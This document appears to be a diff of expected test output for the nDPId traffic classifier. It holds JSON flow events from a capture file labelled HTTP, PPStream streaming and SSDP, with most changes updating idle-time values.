-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7560000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7560000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":338,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":124558,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.42.0.158","src_port":22793,"dst_port":7716,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
